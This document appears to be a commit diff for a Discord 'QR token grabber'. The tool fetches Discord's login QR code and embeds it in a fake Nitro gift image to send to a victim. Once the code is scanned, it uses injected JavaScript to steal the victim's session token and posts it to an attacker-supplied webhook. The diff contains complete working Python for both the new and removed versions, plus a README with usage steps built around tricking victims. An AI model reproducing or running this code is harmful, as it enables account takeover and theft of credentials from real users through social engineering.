Revision by the-cult-of-integral

One prevalent issue was that discord regular changes class names for the QR code, thus breaking the program. This issue has been fixed using regular expressions. Another issue was that people were having trouble with chromedriver and chrome binaries. Therefore, in this revision, a compatible chrome driver and chrome binary are included within the program (84.0.4147.85). Also simplified dependencies; now you just have to run that installation bat.

QR-dtg.py

@@ -0,0 +1,138 @@
+import base64
+import os
+import platform
+import re
+import requests
+import time
+from bs4 import BeautifulSoup
+from colorama import Fore, init
+from PIL import Image
+from selenium import webdriver
+
+
+def clear() -> None:
+    """Clear the screen; works with "cls" and "clear" commands.
+    """
+    if platform.system() == "Windows":
+        os.system("cls")
+    elif platform.system() == "Darwin" or platform.system() == "Linux":
+        os.system("clear")
+    else:
+        pass
+        
+
+def generate_qr() -> None:
+    """Generate a QR code to paste onto a discord nitro template.
+    """
+    qr_img = Image.open(os.path.normpath(r"resources/qr_code.png"), "r")
+    ovly_img = Image.open(os.path.normpath(r"resources/overlay.png"), "r")
+    qr_img.paste(ovly_img, (60, 55))
+    qr_img.save(os.path.normpath(r"resources/final_qr.png"), quality=95)
+
+
+def generate_nitro_template() -> None:
+    """Generate the nitro template using the QR code generated by generate_qr.
+    """
+    nitro_template = Image.open(
+        os.path.normpath(r"resources/template.png"), 
+        "r"
+        )
+    qr_img = Image.open(os.path.normpath(r"resources/final_qr.png"), "r")
+    nitro_template.paste(qr_img, (120, 409))
+    nitro_template.save("discord_gift.png", quality=95)
+
+
+def main(webhook_url) -> None:
+    """Use selenium webdriver to go to the discord login page.
+    Then, grab the source of the page and use regex to identify the class
+    name of the div that contains the QR login image, regardless of
+    whether the class name changes (this avoids the program breaking
+    in the future). Finally, wait for a user to log in and then send token
+    to webhook.
+    """
+    print(f"""
+{Fore.LIGHTMAGENTA_EX}Generating QR — do not close until finished!""")
+    webdriver.ChromeOptions.binary_location = r"browser/chrome.exe"
+    opts = webdriver.ChromeOptions()
+    opts.add_experimental_option("detach", True)
+    driver = webdriver.Chrome(os.path.normpath(r"browser/chromedriver.exe"), options=opts)
+    driver.get("https://discord.com/login")
+    time.sleep(5)  # Make sure QR has fully loaded before taking source!
+    source = BeautifulSoup(driver.page_source, features="lxml")
+    if not (div := re.search(r"qrCode-......", str(source))):
+        print(f"{Fore.LIGHTRED_EX}Error: \
+the regular expression 'qrCode-......' is not found.")
+        os._exit(1)
+    div = div.group(0)
+    div = source.find("div", {"class": f"{div}"})
+    qr_code = div.find("img")["src"]
+    source = BeautifulSoup(driver.page_source, features="lxml")
+    div = source.find("div", {"class": "qrCode"})
+    file = os.path.join(os.getcwd(), r"resources/qr_code.png")
+    img_data =  base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
+
+    with open(file, "wb") as handler:
+        handler.write(img_data)
+    
+    discord_login = driver.current_url
+    generate_qr()
+    generate_nitro_template()
+
+    print(f"""
+{Fore.LIGHTGREEN_EX}Generated QR as discord_gift.png!
+{Fore.BLUE}Waiting for target user to scan the QR code. . .""")
+
+    while True:
+        if discord_login != driver.current_url:
+            token = driver.execute_script('''
+window.dispatchEvent(new Event('beforeunload'));
+let iframe = document.createElement('iframe');
+iframe.style.display = 'none';
+document.body.appendChild(iframe);
+let localStorage = iframe.contentWindow.localStorage;
+var token = JSON.parse(localStorage.token);
+return token;
+   
+''')
+
+            print(f"""
+{Fore.LIGHTGREEN_EX}The following token has been grabbed:
+{token}
+
+{Fore.LIGHTYELLOW_EX}Enter anything to exit\n>>> {Fore.LIGHTWHITE_EX}""", 
+end="")
+            
+            data = {
+                "content": f"Token: {token}",
+                "username": "Token Grabber"
+            }
+            if webhook_url:
+                result = requests.post(webhook_url, json=data)
+                try:
+                    result.raise_for_status()
+                except requests.exceptions.HTTPError as e:
+                    print(f"{Fore.LIGHTRED_EX}{e}")
+                else:
+                    pass
+            break
+    
+    driver.quit()
+
+
+if __name__ == "__main__":
+    init()
+    clear()
+    print(f"""
+
+{Fore.GREEN}QR Discord Token Grabber
+{Fore.BLUE}Created by NightfallGT
+Revised by Luci (9P9)
+Revised by the-cult-of-integral
+
+{Fore.LIGHTYELLOW_EX}Enter a webhook URL.
+>>> {Fore.LIGHTWHITE_EX}""", end="")
+    webhook_url = input()
+    main(webhook_url)
+    input()
+    print(f"{Fore.RESET}")
+    clear()

QR_Generator.py

@@ -1,99 +0,0 @@
-from bs4 import BeautifulSoup
-from selenium import webdriver
-from PIL import Image
-import base64
-import time
-import os
-import requests
-
-#Set Webhook Here! 
-url = "Webhook goes here"
-
-
-# Developer: NightfallGT
-# Revised by: Luci (9P9)
-# Educational purposes only
-
-def logo_qr():
-    im1 = Image.open('temp/qr_code.png', 'r')
-    im2 = Image.open('temp/overlay.png', 'r')
-    im2_w, im2_h = im2.size
-    im1.paste(im2, (60, 55))
-    im1.save('temp/final_qr.png', quality=95)
-
-def paste_template():
-    im1 = Image.open('temp/template.png', 'r')
-    im2 = Image.open('temp/final_qr.png', 'r')
-    im1.paste(im2, (120, 409))
-    im1.save('discord_gift.png', quality=95)
-
-def main():
-    print ("[!] QR Code Token Logger Generator \n")
-
-    options = webdriver.ChromeOptions()
-    options.add_argument("--headless")
-    options.add_experimental_option('excludeSwitches', ['enable-logging'])
-    options.add_experimental_option('detach', True)
-    driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
-
-    print('[?] Awaiting Page to Load!')
-    driver.get('https://discord.com/login')
-    time.sleep(5)
-    print('[*] Page loaded.')
-
-    page_source = driver.page_source
-
-    soup = BeautifulSoup(page_source, features='lxml')
-
-    div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
-    qr_code = div.find('img')['src']
-    file = os.path.join(os.getcwd(), 'temp/qr_code.png')
-
-    img_data =  base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
-
-    with open(file,'wb') as handler:
-        handler.write(img_data)
-
-    discord_login = driver.current_url
-    logo_qr()
-    paste_template()
-
-    print('[!] QR Code has been generated as discord_gift.png \n')
-    print('[?] Send the QR Code to user and scan. Waiting...')
-    
-    while True:
-        if discord_login != driver.current_url:
-            print('Grabbing token... \n')
-            token = driver.execute_script('''
-window.dispatchEvent(new Event('beforeunload'));
-let iframe = document.createElement('iframe');
-iframe.style.display = 'none';
-document.body.appendChild(iframe);
-let localStorage = iframe.contentWindow.localStorage;
-var token = JSON.parse(localStorage.token);
-return token;
-   
-''')
-            print('------------------------------------------------------------------------------------------')
-            print('Token grabbed:',token)
-            #==================================================================================================================================
-            #Token Sent To webhook
-            
-            data = {
-                "content" : f"```Token: {token} ```",
-                "username" : "Token Logger"
-            }
-            result = requests.post(url, json = data)
-            try:
-                result.raise_for_status()
-            except requests.exceptions.HTTPError as err:
-                print(err)
-            else:
-                print("Token Grabbed! Sent to Webook | code {}.".format(result.status_code))
-            #==================================================================================================================================
-            print('------------------------------------------------------------------------------------------')
-            break
-    print('Task complete.')
-
-if __name__ == '__main__':
-    main()

README.md

@@ -1,39 +1,27 @@
-# Discord-QR-Scam
-
-### About
-A Python script that automatically generates a Nitro scam QR code and grabs the Discord token when scanned. This tool demonstrates how people can trick others
-into scanning their Discord login QR Code, and gain access to their account. Use for Educational Purposes only.
+# QR Discord Token Grabber
+A python script that generates a scam nitro QR code which can grab a victim's authentication token if scanned. Developed to show how social engineering is performed; use for educational purposes only.
 
 ![img1](https://i.ibb.co/BL2Q0jz/Screenshot-527.png)
 
 ## Demonstration
+
 ![qr-code](https://user-images.githubusercontent.com/75003671/117522092-fd79ff80-afe3-11eb-938c-23dd68d5927c.gif)
 
 ## Usage
-1. If you dont have python installed, download python 3.7.6
-and make sure you click on the 'ADD TO PATH' option during
-the installation.
+1. This project requires [Python >= 3.7.6](https://python.org). When installing Python, make sure to check the *ADD TO PATH* checkbox.
 
-2. Install the required modules > ```pip install -r requirements.txt``` or double click `pip_install_requirements.bat` also make sure to edit "URL" variable within the program to add your webhook!
+2. Run the `[1] install_requirements.bat` file.
 
-3. Type ```python QR_Generator.py``` in cmd to run or double click `run_script.bat`
+3. Unzip the `browser.7z` file so that the browser folder is in the same directory as the `[2] run.bat` file.
 
-4. Wait for the `discord_gift.png` to be generated. Send the image to the victim and make them scan it.
+4. Run the `[2] run.bat` file.
 
-5. QR Code only lasts about 2 minutes. Make sure you send a fresh one to the victim and he is ready to scan.
+5. Input your discord webhook link (this link is used to post the authentication token to a channel). Note that, even if you do not input a webhook link, you will still receive the token when it is printed to the console, but note that you will lose this token once the program is closed!
 
-6. When the QR Code is scanned, you will automatically be logged in to their account and the script will grab the Discord token.
+6. Wait for `discord_gift.png` to be generated. Then, send the image to a victim for them to scan it. Note that the QR code is only valid for approximately two minutes after creation.
 
-## Troubleshoot
-Make sure your chromedriver.exe file is the same version as your current Chrome web browser version. To check your current Chrome version,
-paste `chrome://settings/help` in Google Chrome.
+7. When the QR code is scanned, you will be logged onto their account and receive their discord authentication token.
 
-if Chrome crashes,
+## Need extra help?
 
-1. Make sure your chromedriver.exe file is the same version as your Chrome web browser version
-2. Download the latest version chromedriver.exe here: https://chromedriver.chromium.org/downloads
-3. Then replace the chromedriver.exe file in the folder.
-
-## Any Extra Help!
-
-Join the Support Discord Server: https://discord.gg/a24Sp9bEXu 
+[Join the discord server for support!](https://discord.gg/a24Sp9bEXu)

[1] install_requirements.bat

@@ -1,4 +1 @@
-@echo off
-title [313] PIP Install Requirements
-pip install -r requirements.txt
-pause
+pip install beautifulsoup4 colorama lxml pillow requests selenium

[2] run.bat

@@ -1,4 +1,4 @@
 @echo off
-title [313] Token QR Stealer [Made by NightFall and Revised By Luci] 
-python qr_generator.py
-pause
+title QR Discord Token Grabber [Developed by NightFall, Revised By Luci and the-cult-of-integral] 
+python QR-dtg.py
+title Terminal

requirements.txt

@@ -1,5 +0,0 @@
-beautifulsoup4
-selenium
-pillow
-lxml
-requests